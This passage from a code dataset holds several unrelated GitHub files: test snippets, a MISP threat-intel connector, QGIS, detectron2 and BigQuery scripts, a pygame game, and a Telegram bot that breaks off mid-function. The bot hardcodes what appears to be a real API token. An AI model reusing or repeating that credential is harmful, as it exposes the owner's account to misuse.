self.ae(le.cursor_pos, 1)\n self.assertFalse(le.pending_bell)\n le.backspace(num=2)\n self.ae(le.current_input, '')\n self.ae(le.cursor_pos, 0)\n le.backspace()\n self.assertTrue(le.pending_bell)\n\n def test_multiprocessing_spawn(self):\n from kitty.multiprocessing import test_spawn\n test_spawn()\n","repo_name":"kovidgoyal/kitty","sub_path":"kitty_tests/tui.py","file_name":"tui.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":20382,"dataset":"github-code","pt":"7"} +{"seq_id":"71884149344","text":"import pytest\nfrom dune.xt.common.test import load_all_submodule\n\n\ndef test_load_all():\n import dune.xt.common as xtc\n load_all_submodule(xtc)\n\n\ndef test_empty():\n from dune.xt.common._empty import Dog, Pet, Terrier\n\n dog = Dog('Susi')\n pet = Pet('Bello')\n ter = Terrier()\n\n assert ter.getName() == 'Berti'\n assert pet.getName() == 'Bello'\n assert ter.bark() == 'woof!'\n\n\ndef test_logging():\n import dune.xt.common.logging as lg\n lg.create(lg.log_max)\n lg.info('log info test')\n lg.error('log error test')\n lg.debug('log debug test')\n\n\ndef test_timings():\n from dune.xt.common.timings import 
instance\n timings = instance()\n timings.reset()\n timings.start(\"foo.bar\")\n timings.stop()\n timings.output_simple()\n\n\nif __name__ == '__main__':\n from dune.xt.common.test import runmodule\n runmodule(__file__)\n","repo_name":"dune-community/dune-xt-common","sub_path":"python/test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"30782247481","text":"import json\nimport logging\n\nfrom pymisp.api import PyMISP, MISPAttribute, MISPEvent, MISPTag\nfrom typing import List, Union\nfrom urllib.parse import urljoin\n\nimport saq\n\nfrom saq.constants import *\nfrom saq.indicators import Indicator\nfrom saq.tip.base import TIP\n\n\nclass MISP(TIP):\n def __init__(self):\n super().__init__()\n\n self.ioc_type_mappings = {\n I_DOMAIN: 'domain',\n I_EMAIL_ATTACHMENT_NAME: 'filename',\n I_EMAIL_CC_ADDRESS: 'email-dst',\n I_EMAIL_FROM_ADDRESS: 'email-src',\n I_EMAIL_FROM_ADDRESS_DOMAIN: 'domain',\n I_EMAIL_MESSAGE_ID: 'email-message-id',\n I_EMAIL_SUBJECT: 'email-subject',\n I_EMAIL_TO_ADDRESS: 'email-dst',\n I_EMAIL_X_AUTH_ID: 'email-src',\n I_EMAIL_X_MAILER: 'email-x-mailer',\n I_EMAIL_X_ORIGINAL_SENDER: 'email-src',\n I_EMAIL_X_ORIGINATING_IP: 'ip-src',\n I_EMAIL_REPLY_TO: 'email-src',\n I_EMAIL_RETURN_PATH: 'email-src',\n I_EMAIL_X_SENDER: 'email-src',\n I_EMAIL_X_SENDER_ID: 'email-src',\n I_EMAIL_X_SENDER_IP: 'ip-src',\n I_FILE_NAME: 'filename',\n I_IP_DEST: 'ip-dst',\n I_IP_SOURCE: 'ip-src',\n I_MD5: 'md5',\n I_SHA1: 'sha1',\n I_SHA256: 'sha256',\n I_URI_PATH: 'uri',\n I_URL: 'url'\n }\n\n self.name = 'MISP'\n self.misp_url = saq.CONFIG['misp']['url']\n self.api_key = saq.CONFIG['misp']['api_key']\n self._pymisp_client = None\n\n @property\n def pymisp_client(self):\n if self._pymisp_client is None:\n self._pymisp_client = PyMISP(self.misp_url, self.api_key)\n\n return self._pymisp_client\n\n def _get_event_cache_key(self, event: dict) -> str:\n return f'event:{event[\"uuid\"]}'\n\n def _get_indicator_cache_key(self, indicator: dict) -> str:\n return f'indicator:{indicator[\"type\"]}:{indicator[\"value\"]}'\n\n def ace_event_exists_in_tip(self, ace_event_uuid: str) -> bool:\n result = self.pymisp_client.get_event(ace_event_uuid)\n return 'Event' in result\n\n def add_indicators_to_event_in_tip(self, ace_event_uuid: str, indicators: Union[List[Indicator], List[dict], dict]) -> bool:\n def _convert_indicator_objects_to_dicts(indicator_objects: List[Indicator]) -> List[dict]:\n return [i.json if isinstance(i, Indicator) else i for i in indicator_objects]\n\n if isinstance(indicators, dict):\n indicators = [indicators]\n\n indicators = _convert_indicator_objects_to_dicts(indicators)\n\n misp_event = self.pymisp_client.get_event(ace_event_uuid, pythonify=True)\n\n for indicator in indicators:\n misp_attribute = MISPAttribute()\n misp_attribute.type = indicator['type']\n misp_attribute.value = indicator['value']\n\n if 'status' in indicator and indicator['status'].lower() == 'informational':\n misp_attribute.to_ids = False\n\n if 'tags' in indicator:\n for tag in indicator['tags']:\n misp_tag = MISPTag()\n misp_tag.name = tag\n misp_attribute.tags.append(misp_tag)\n\n misp_event.attributes.append(misp_attribute)\n\n result = self.pymisp_client.update_event(misp_event)\n\n return 'Event' in result\n\n def create_event_in_tip(self, ace_event_name: str, ace_event_uuid: str, ace_event_url: str) -> bool:\n if self.ace_event_exists_in_tip(ace_event_uuid):\n return 
True\n\n event = MISPEvent()\n event.info = ace_event_name\n event.uuid = ace_event_uuid\n\n link_attribute = MISPAttribute()\n link_attribute.category = 'Internal reference'\n link_attribute.type = 'link'\n link_attribute.value = ace_event_url\n link_attribute.comment = 'ACE Event'\n link_attribute.disable_correlation = True\n event.attributes.append(link_attribute)\n\n for event_tag in saq.CONFIG['tip']['event_tags'].split(','):\n tag = MISPTag()\n tag.name = event_tag\n event.tags.append(tag)\n\n result = self.pymisp_client.add_event(event)\n if 'Event' in result:\n logging.info(f'Created MISP event {ace_event_uuid}')\n return True\n\n return False\n\n def event_url(self, event_id: str) -> str:\n return urljoin(self.misp_url, f'/events/view/{event_id}')\n\n def get_all_events_from_tip(self) -> List[dict]:\n result = self.pymisp_client.events()\n return result if 'errors' not in result else []\n\n def get_all_indicators_from_tip(self, enabled: bool = True, modified_after_timestamp: int = 0) -> List[dict]:\n result = self.pymisp_client.search(controller='attributes', to_ids=enabled, timestamp=modified_after_timestamp)\n return result['Attribute'] if 'Attribute' in result else []\n\n def get_indicator_summaries_from_cache(self, indicators: List[dict]) -> List[dict]:\n summaries = []\n for cache_hit in self.find_indicators(indicators):\n summary = {\n 'type': cache_hit[0]['type'],\n 'value': cache_hit[0]['value'],\n 'event_tags': set(),\n 'indicator_tags': set(),\n 'tip_event_urls': set()\n }\n\n for indicator in cache_hit:\n cached_event = self.find_event(indicator['Event']['uuid'])\n if cached_event:\n summary['tip_event_urls'].add(self.event_url(cached_event['id']))\n\n if 'EventTag' in cached_event:\n summary['event_tags'] |= {tag['Tag']['name'] for tag in cached_event['EventTag']}\n\n if 'Tag' in indicator:\n summary['indicator_tags'] |= {tag['name'] for tag in indicator['Tag']}\n\n summary['event_tags'] = sorted(list(summary['event_tags']))\n summary['indicator_tags'] = sorted(list(summary['indicator_tags']))\n summary['tip_event_urls'] = sorted(list(summary['tip_event_urls']))\n\n summaries.append(summary)\n\n return summaries\n","repo_name":"ace-ecosystem/ACE","sub_path":"saq/tip/misp.py","file_name":"misp.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"} +{"seq_id":"17242153952","text":"#from qgis.utils import qgsfunction\r\n\r\nimport qgis\r\n\r\nfrom qgis.core import *\r\nfrom qgis.gui import *\r\nfrom qgis.utils import *\r\nimport math\r\nfrom geomGen import genGeom\r\n\r\nimport sys\r\n\r\n\r\n\"\"\" ****************************** \"\"\"\r\n\r\n\r\n@qgsfunction(args='auto', group='tblLabel', usesgeometry=True, register=True)\r\ndef tblDisplay(feature, parent):\r\n try:\r\n res = genGeom.displayTable(feature)\r\n except:\r\n QgsMessageLog.logMessage('generate_display_geometry error in expression function: {}'.format(sys.exc_info()[0]), tag=\"TOMs panel\")\r\n\r\n return res\r\n\r\nfunctions = [\r\n tblDisplay\r\n]\r\n\r\ndef registerFunctions():\r\n\r\n tbl_list = QgsExpression.Functions()\r\n\r\n for func in functions:\r\n QgsMessageLog.logMessage(\"Considering function {}\".format(func.name()), tag=\"TOMs panel\")\r\n try:\r\n if func in tbl_list:\r\n QgsExpression.unregisterFunction(func.name())\r\n #del toms_list[func.name()]\r\n except AttributeError:\r\n #qgis.toms_functions = dict()\r\n pass\r\n\r\n if QgsExpression.registerFunction(func):\r\n 
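# registration succeeded, so record it in the TOMs panel log\n            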
QgsMessageLog.logMessage(\"Registered expression function {}\".format(func.name()), tag=\"TOMs panel\")\r\n #qgis.toms_functions[func.name()] = func\r\n\r\n \"\"\"for title in qgis.toms_functions:\r\n QgsMessageLog.logMessage(\"toms_functions function {}\".format(title), tag=\"TOMs panel\")\r\n\r\n for title2 in toms_list:\r\n QgsMessageLog.logMessage(\"toms_list function {}\".format(title2.name()), tag=\"TOMs panel\")\"\"\"\r\n\r\ndef unregisterFunctions():\r\n # Unload all the functions that we created.\r\n for func in functions:\r\n QgsExpression.unregisterFunction(func.name())\r\n QgsMessageLog.logMessage(\"Unregistered expression function {}\".format(func.name()), tag=\"TOMs panel\")\r\n #del qgis.toms_functions[func.name()]\r\n\r\n QgsExpression.cleanRegisteredFunctions()\r\n","repo_name":"tlh22/FlowReporting","sub_path":"tblExpressions.py","file_name":"tblExpressions.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40244050742","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sp\nfrom scipy import signal\nfrom ptsa.ptsa import emd\n\ndef main():\n x = np.linspace(0, np.pi * 30, 1000)\n y1 = np.sin(x)\n y2 = np.sin(x / 2)\n y3 = np.sin(x / 4)\n y = y1 + y2 + y3\n f, ax = plt.subplots(4, 1, sharex=True, sharey=True)\n ax[0].plot(x, y, color=\"k\")\n ax[0].set_title(\"Original Signal\", fontsize=22)\n \n ue = emd._get_upper_spline(y)\n le = -emd._get_upper_spline(-y)\n ax[1].plot(x, y, color=\"k\")\n ax[1].plot(x, ue, color=\"r\", linestyle=\"-\")\n ax[1].plot(x, le, color=\"g\", linestyle=\"-\")\n avg = (ue + le) / 2\n ax[1].plot(x, avg, color=\"b\", linestyle=\"-\")\n ax[1].set_title(\"Calculate Mean of Upper and Lower Envolopes\", fontsize=22)\n \n imf1 = y - avg\n ax[2].plot(x, imf1, color=\"k\")\n ax[2].set_title(\"Intrinsic Mode Function (IMF) = Original Signal - Mean\", fontsize=22)\n\n res = y - imf1\n ax[3].plot(x, res, color=\"k\")\n ax[3].set_title(\"Residual = Original Signal - IMF\", fontsize=22)\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PCMan/vf_filter","sub_path":"demo_emd.py","file_name":"demo_emd.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72869752222","text":"from datetime import timedelta\n\nimport detectron2.utils.comm as comm\nfrom detectron2.config import get_cfg\nfrom detectron2.engine import DEFAULT_TIMEOUT, default_argument_parser, default_setup, hooks, launch\nfrom detectron2.evaluation import verify_results\nfrom detectron2.utils.file_io import PathManager\nfrom detectron2.utils.logger import setup_logger\n\nfrom densepose import add_densepose_config\nfrom densepose.engine import Trainer\nfrom densepose.modeling.densepose_checkpoint import DensePoseCheckpointer\n\n\ndef setup(args):\n cfg = get_cfg()\n add_densepose_config(cfg)\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n # Setup logger for \"densepose\" module\n setup_logger(output=cfg.OUTPUT_DIR, distributed_rank=comm.get_rank(), name=\"densepose\")\n return cfg\n\n\ndef main(args):\n cfg = setup(args)\n # disable strict kwargs checking: allow one to specify path handle\n # hints through kwargs, like timeout in DP evaluation\n PathManager.set_strict_kwargs_checking(False)\n\n if args.eval_only:\n model = Trainer.build_model(cfg)\n 
DensePoseCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(\n cfg.MODEL.WEIGHTS, resume=args.resume\n )\n res = Trainer.test(cfg, model)\n if cfg.TEST.AUG.ENABLED:\n res.update(Trainer.test_with_TTA(cfg, model))\n if comm.is_main_process():\n verify_results(cfg, res)\n return res\n\n trainer = Trainer(cfg)\n trainer.resume_or_load(resume=args.resume)\n if cfg.TEST.AUG.ENABLED:\n trainer.register_hooks(\n [hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]\n )\n return trainer.train()\n\n\nif __name__ == \"__main__\":\n args = default_argument_parser().parse_args()\n cfg = setup(args)\n timeout = (\n DEFAULT_TIMEOUT if cfg.DENSEPOSE_EVALUATION.DISTRIBUTED_INFERENCE else timedelta(hours=4)\n )\n print(\"Command Line Args:\", args)\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n timeout=timeout,\n )\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/dev/cv/image_classification/SlowFast_ID0646_for_PyTorch/detectron2/projects/DensePose/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"30295188016","text":"import sys, pygame\nimport math\n\nscreen_width = 640\nscreen_height = 480\nwin = pygame.display.set_mode((screen_width, screen_height))\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\n# target\ntargetY = 150\ntargetX = 100\ntargetX_change = 0\ntargetY_change = 0\n\n# bullet\nvelocity = 10\ntheta = 20\ntime = 0\nbullet_x = 0\nbullet_y = screen_height\nbullet_state = \"ready\"\n\n\ndef update_position(t):\n g = 9.8 / 100\n global bullet_x\n global bullet_y\n global bullet_state\n global velocity\n global theta\n if bullet_state == \"fire\":\n bullet_x = velocity * math.cos(theta) * t\n bullet_y = velocity * math.sin(theta) * t - 0.5 * g * t * t\n bullet_y = screen_height - bullet_y\n #print(str(bullet_x) + \" \" + str(bullet_y))\n if bullet_x > screen_width or bullet_x < 0 or bullet_y > screen_height or bullet_y < -1:\n bullet_state = \"ready\"\n bullet_x = 0\n bullet_y = screen_height\n\n\ndef fire_bullet():\n global bullet_x\n global bullet_y\n global bullet_state\n global time\n if bullet_state == \"ready\":\n time = 0\n bullet_state = \"fire\"\n\n\nwhile 1:\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n\n if event.type == pygame.KEYDOWN:\n\n if event.key == pygame.K_UP:\n targetY_change = -.4\n\n if event.key == pygame.K_DOWN:\n targetY_change = .4\n\n if event.key == pygame.K_LEFT:\n targetX_change = -.4\n\n if event.key == pygame.K_RIGHT:\n targetX_change = .4\n\n if event.key == pygame.K_SPACE:\n fire_bullet()\n\n if event.key == pygame.K_w:\n theta += 0.1\n if event.key == pygame.K_s:\n theta -= 0.1\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n targetX_change = 0\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\n targetY_change = 0\n\n if targetY <= 0:\n targetY = 0\n if targetY >= 430:\n targetY = 430\n if targetX >= 590:\n targetX = 590\n if targetX <= 320:\n targetX = 320\n\n targetX += targetX_change\n targetY += targetY_change\n\n if bullet_state == \"fire\":\n time = time + 0.05\n update_position(time)\n\n bullet = pygame.Rect(bullet_x, bullet_y, 10, 10)\n print(str(bullet_x) + \" \" + str(bullet_y))\n target = pygame.Rect(targetX, targetY, 50, 50)\n win.fill(black)\n win.fill(white, target)\n 
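# fill() calls apply in order, so the bullet rect is painted on top of the target just before the frame is flipped.\n 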
win.fill(white, bullet)\n pygame.display.flip()\n","repo_name":"yingqiw/games-shoottarget","sub_path":"target_shooter.py","file_name":"target_shooter.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18050496256","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nfrom numpy.polynomial import polynomial as P\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom astropy import constants as const\nimport os, sys,argparse\nimport statsmodels.tsa.stattools as st\n\n#####################################################################################\n\n# SET UP ARGUEMENTS\n\n#####################################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--nbins\", type=int, default=None, help=\"Number of images files from which to extract the spectrum; note: zero-indexed, so nbins=11 means bin00 to bin10\")\nparser.add_argument(\"-c\", \"--nchan\", type=int, default=None, help=\"Number of channel slices in each cube image; note: zero-indexed\")\nparser.add_argument(\"-s\", \"--src\", type=str, default=None, help=\"Source name to be used for the spectra text file prefix\")\nparser.add_argument(\"--timeres\", type=float, default=None, help=\"Temporal resolution of data in ms\")\nparser.add_argument(\"--freqres\", type=float, default=None, help=\"Spectral resolution of data in MHz\")\nparser.add_argument(\"-f\", \"--basefreq\", type=float, default=None, help=\"The lowest frequency in the observation in MHz\")\nparser.add_argument(\"--frbtitletext\", type=str, default=\"\", help=\"The name of the FRB (or source) to be used as the title of the plots\")\nparser.add_argument(\"--ccfstartstop\", type=str, default=None, help=\"Start and end bins for calculating the CCF (startbin1,stopbin1,startbin2,stopbin2)\")\n\nargs = parser.parse_args()\n\nprint(args)\n\n#####################################################################################\n\n# CATCH ERRORS\n\n#####################################################################################\n\nif len(sys.argv) < 2:\n parser.print_usage()\n sys.exit()\n\nif args.nbins is None:\n parser.error(\"You must specify the number of images you're processing\")\n\nif args.nchan is None:\n parser.error(\"You must specify the number of slices in the cube image\")\n\nif args.src is None:\n parser.error(\"You must specify an input/output spectra file name prefix\")\n\nif args.timeres is None:\n parser.error(\"You must specify the data's temporal resolution\")\n\nif args.freqres is None:\n parser.error(\"You must specify the data's spectral resolution\")\n\nif args.basefreq is None:\n parser.error(\"You must specify the data's lowest frequency\")\n\nif args.ccfstartstop == None or len(args.ccfstartstop.split(',')) != 4:\n parser.error(\"You must specify the bin ranges to use for calculations in format start1,stop1,start2,stop2\")\n\n#####################################################################################\n\n# GLOBAL PARAMETER DEFINITIONS\n\n#####################################################################################\n\n# Source specific parameters\nsrc = args.src # source name\nfrbtitletext = args.frbtitletext # name of source to use in plotting\n\n# Temporal parameters\nnbins = args.nbins # number of time bins\ntimeres = args.timeres # resolution of time bins (ms)\nstarttime = 0 
# start time (ms)\nendtime = nbins*timeres # final time (ms)\n\n# Spectral parameters\nnchan = args.nchan # number of frequency channels in the data\nendchan = nchan - 1 # remove final channel due to bandpass rolloff\nfreqres = args.freqres # spectral resolution of the data (MHz)\nbasefreq = args.basefreq # lowest frequency in the data (MHz)\nendfreq = basefreq + (endchan*freqres) # highest frequency to be used (MHz)\nfreqs = np.linspace(basefreq, endfreq, nchan) # MHz\n\n# ACF parameters\nccfstart1 = int(args.ccfstartstop.split(',')[0]) # starting time bin for user selected range\nccfstop1 = int(args.ccfstartstop.split(',')[1]) # final time bin for user selected range\nccfstart2 = int(args.ccfstartstop.split(',')[2]) # starting time bin for user selected range\nccfstop2 = int(args.ccfstartstop.split(',')[3]) # final time bin for user selected range\n\n# Change global font size for easier reading\nmatplotlib.rcParams.update({'font.size': 16})\n\n\n#####################################################################################\n\n# 1D CCF\n\n#####################################################################################\n\n# Load calibrated data\nprint(\"Loading data: {0}-imageplane-dynspectrum-calibrated.stokesI.txt\".format(src))\ndynspec_I = np.loadtxt(\"{0}-imageplane-dynspectrum-calibrated.stokesI.txt\".format(src))\n\n# TODO: Weight the time average by fscrunch, rather than doing a simple mean\npulse1spectra = np.mean(dynspec_I[ccfstart1:ccfstop1+1], 0)\npulse2spectra = np.mean(dynspec_I[ccfstart2:ccfstop2+1], 0)\n\n# CCF calculation for individual bins\nprint(\"Computing CCF between user-selected pulse1 and pulse2\")\n\n# Calculate the 1D CCF across frequency between the two user-selected time ranges using statsmodels.tsa.stattools.ccovf\nccf = st.ccovf(pulse1spectra, pulse2spectra)\n\n# Set up figure and axes\nccf_fig, ccf_ax = plt.subplots(figsize=(7,7))\n\n# Plot the CCF\nccf_ax.plot(ccf, label='CCF (bins {0}-{1} x {2}-{3})'.format(ccfstart1,ccfstop1,ccfstart2,ccfstop2))\nplt.legend()\nccf_fig.savefig(\"{0}-CCF_bin{1}-{2}x{3}-{4}.png\".format(src,ccfstart1,ccfstop1,ccfstart2,ccfstop2), bbox_inches='tight')\n","repo_name":"difx/difx","sub_path":"sites/ASKAP/ccf_scint.py","file_name":"ccf_scint.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"6545465785","text":"from math import floor\n\ndef encode(a, b, p, char, k):\n m = ord(char)\n x = m*k + 1\n found = False\n result = 0\n \n while (not found):\n target_remainder = (x**3 + a*x + b) % p\n for i in range(p):\n if ((i**2) % p == target_remainder):\n found = True\n result = i\n break\n if (not found):\n x += 1\n\n return ((x, result))\n\ndef decode(pair, k):\n return floor((pair[0] - 1)/k)\n\n# encoded = encode(-1, 188, 751, '1', 20)\n# decoded = decode(encoded, 20)\n\n# print(encoded)\n# print(chr(decoded))\n","repo_name":"salsabiilashifa11/crypto-calculator","sub_path":"ecc/kolbitz.py","file_name":"kolbitz.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19529972047","text":"import openpyxl\nfrom find_all_value import find_value\nfrom decoding_data import decoding_operation\nfrom find_description_operation import find_description\n\ndata = find_value()\ndata_1 = decoding_operation()\nmy_dict = find_description()\n\nbook = openpyxl.Workbook()\nsheet = book.active\nbook_1 = 
openpyxl.open(\"ValueStreamMapping.xlsx\", read_only=True)\nsheet_4 = book_1.worksheets[4]\n\n# Заполнение шапки документа\nsheet['A1'] = 'ОБОЗНАЧЕНИЕ'\nsheet['B1'] = 'НАИМЕНОВАНИЕ'\nsheet['C1'] = 'МАРШРУТ'\nsheet['D1'] = 'ВХОДИМОСТЬ'\nsheet['E1'] = 'ПАРТИЯ'\nsheet['F1'] = 'ЦЕНА за шт.'\nsheet['G1'] = 'ЦЕНА за комплект'\nsheet['H1'] = '№ ОПЕРАЦИИ'\nsheet['I1'] = 'НАИМЕНОВАНИЕ ОПЕРАЦИИ'\nsheet['J1'] = 'ОБОРУДОВАНИЕ'\nsheet['K1'] = 'Тпз, мин'\nsheet['L1'] = 'Тшт, мин'\nsheet['M1'] = 'КОИД'\n\n#Заполнение общей части информации о детали\nsheet['A2'].value = data[2]\nsheet['B2'].value = data[1]\nsheet['C2'].value = data[8]\nif data[1] == 'Ролик РВП':\n sheet['D2'].value = 7\nelif data[1] == 'Сепаратор РВП':\n sheet['D2'].value = 2\nelse:\n sheet['D2'].value = 1\nsheet['E2'].value = 50 * sheet['D2'].value\n\n#Заполнение данных о каждой операции\nrow = 2\nfor i in data_1:\n if len(i) > 6:\n sheet[row][10].value = i[3]\n sheet[row][11].value = i[4]\n sheet[row][12].value = i[5]\n elif len(i) <= 3:\n sheet[row][10].value = i[1]\n sheet[row][11].value = i[2]\n sheet[row][7].value = i[0]\n elif len(i) > 3 and len(i) <= 6:\n sheet[row][10].value = i[1]\n sheet[row][11].value = i[2]\n sheet[row][7].value = i[0]\n sheet[row+1][10].value = i[4]\n sheet[row+1][11].value = i[5]\n sheet[row+1][7].value = i[3]\n row += 1\n row += 1\n\n# Заполнение описания операций\ncolumn = []\nfor key in my_dict:\n column.append(my_dict[key])\ncolumn_operation = column [10:]\n\nnew_row = 2\nfor val in column_operation:\n for all_val in val:\n if all_val < 47:\n sheet[new_row][7].value = sheet_4[19][all_val].value\n sheet[new_row][8].value = sheet_4[17][all_val].value\n if all_val > 46:\n sheet[new_row][9].value = sheet_4[5][all_val].value\n new_row += 1\n else:\n sheet[new_row][9].value = sheet_4[5][all_val].value\n new_row += 1\n\nbook.save(\"technology.xlsx\")\nbook.close()\n\nprint(\"Файл technology.xlsx записан\")\n","repo_name":"EgorZaharov/Level-Up","sub_path":"Project/record_operation.py","file_name":"record_operation.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23756752912","text":"import os\nimport argparse\nfrom google.cloud import bigquery\nfrom google.cloud.exceptions import NotFound\n\ndef upload_csv_to_bigquery():\n \"\"\"Uploads a CSV file to a given BigQuery table.\"\"\"\n # Load arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('csv_file', help='Path to the CSV file')\n parser.add_argument('--project_id', help='Google Cloud project ID')\n parser.add_argument('--dataset_id', help='BigQuery dataset ID')\n parser.add_argument('--table_id', help='BigQuery table ID')\n parser.add_argument('--mode', help='append or overwrite', default='append')\n parser.add_argument('--auto_create_table', help='auto create table', default='True') \n\n args = parser.parse_args()\n csv_file_path = args.csv_file\n project_id = args.project_id\n dataset_id = args.dataset_id\n table_id = args.table_id\n mode = args.mode\n auto_create_table = args.auto_create_table == 'True'\n\n # Create a BigQuery client\n client = bigquery.Client(project=project_id)\n\n # Check if the dataset exists\n dataset_ref = client.dataset(dataset_id)\n dataset = bigquery.Dataset(dataset_ref)\n\n # Check if the table exists, create it if necessary\n table_ref = dataset.table(table_id)\n try:\n client.get_table(table_ref)\n except NotFound:\n table = bigquery.Table(table_ref)\n if auto_create_table:\n table = 
client.create_table(table)\n else:\n raise Exception('Table not found: {}.{}.{}'.format(project_id, dataset_id, table_id))\n\n # Load the CSV data into the table\n job_config = bigquery.LoadJobConfig()\n job_config.source_format = bigquery.SourceFormat.CSV\n job_config.skip_leading_rows = 1\n job_config.autodetect = True\n if mode == 'append':\n job_config.write_disposition = bigquery.WriteDisposition.WRITE_APPEND\n elif mode == 'overwrite':\n job_config.write_disposition = bigquery.WriteDisposition.WRITE_TRUNCATE\n \n with open(csv_file_path, 'rb') as f:\n job = client.load_table_from_file(f, table_ref, job_config=job_config)\n job.result()\n\n print('CSV file uploaded to BigQuery successfully.')\n\n\nif __name__ == '__main__':\n upload_csv_to_bigquery()\n","repo_name":"kromiii/csv2bq","sub_path":"csv2bq/csv2bq.py","file_name":"csv2bq.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17252233529","text":"from datetime import date\nimport re\n\ntry:\n import jinja2\nexcept ImportError:\n jinja2 = None\n\nfrom scheme.exceptions import *\nfrom scheme.timezone import current_timestamp\nfrom scheme.util import string\n\n__all__ = ('Interpolator', 'interpolate_parameters')\n\nVARIABLE_EXPR = re.compile(r'^\\s*[$][{]([^}]+)[}]\\s*$')\n\nclass Interpolator(object):\n \"\"\"The standard jinja-based interpolator.\"\"\"\n\n default_interpolator = None\n standard_filters = []\n standard_globals = []\n\n def __init__(self, filters=None, globals=None):\n self.environment = jinja2.Environment(\n variable_start_string='${',\n variable_end_string='}')\n\n for filter in self.standard_filters:\n self.environment.filters[filter.__name__] = filter\n for function in self.standard_globals:\n self.environment.globals[function.__name__] = function\n\n if filters:\n self.environment.filters.update(filters)\n if globals:\n self.environment.globals.update(globals)\n\n @classmethod\n def default(cls):\n if cls.default_interpolator is None:\n cls.default_interpolator = cls()\n return cls.default_interpolator\n\n def evaluate(self, subject, parameters):\n expression = self.environment.compile_expression(subject, False)\n try:\n value = expression(**parameters)\n if isinstance(value, self.environment.undefined):\n raise UndefinedParameterError()\n except jinja2.UndefinedError:\n raise UndefinedParameterError()\n else:\n return value\n\n def interpolate(self, subject, parameters):\n template = self.environment.from_string(subject)\n return template.render(parameters)\n\ndef interpolate_parameters(subject, parameters, simple=False, interpolator=None):\n \"\"\"Interpolates ``subject``, a template string, using ``parameters``. 
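For example, interpolating ``'v=${x}'`` with ``{'x': 1}`` renders ``'v=1'``; with ``simple=True``, ``'${x}'`` evaluates to the raw value ``1`` rather than a string. 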
If ``subject`` is empty,\n an empty string is immediately returned.\n\n :param string subject: The template to interpolate.\n\n :param dict parameters: A ``dict`` of potential values for interpolating ``subject``.\n\n :param boolean simple: Optional, default is ``False``; if ``True``, indicates that subject\n should be treated as a single variable reference, rather than a full template.\n\n :param interpolator: Optional, default is ``None``; a :cls:`Interpolator` instance to use for\n interpolation, instead of the default one.\n \"\"\"\n\n if not isinstance(subject, string):\n raise ValueError(subject)\n if not subject:\n return ''\n\n interpolator = interpolator or Interpolator.default()\n if not simple:\n return interpolator.interpolate(subject, parameters)\n\n match = VARIABLE_EXPR.match(subject)\n if match:\n expression = match.group(1).strip()\n return interpolator.evaluate(expression, parameters)\n else:\n return subject\n","repo_name":"stiles/notebooks","sub_path":"lapd-crimes-arrests/notebook/lib/python3.7/site-packages/scheme/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"7"} +{"seq_id":"7339325136","text":"import telebot\n\ntoken = '5950809236:AAFkP78oCICMqiO78zCJk39Jqb276RBuZaY'\n\nbot = telebot.TeleBot(token)\n# keyboard\nkeybord = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\n# buttons\nbutton1 = telebot.types.KeyboardButton('Start')\nbutton2 = telebot.types.KeyboardButton('Quit')\n\n# combine the buttons\nkeybord.add(button1, button2)\n\n\n@bot.message_handler(commands=['start', 'privet'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'Здравствуйте, выберите кнопку',reply_markup=keybord)\n\n bot.register_next_step_handler(message, check)\n\ndef check(message):\n if message.text == 'Yes':\n bot.send_sticker(message.chat.id, 'CAACAgQAAxkBAAEGgCFjfGALIaBjVNorzBQ4OZwu7FIhjgAClRcAAqbxcR4BOaqKL395ICsE')\n elif message.text == 'No':\n 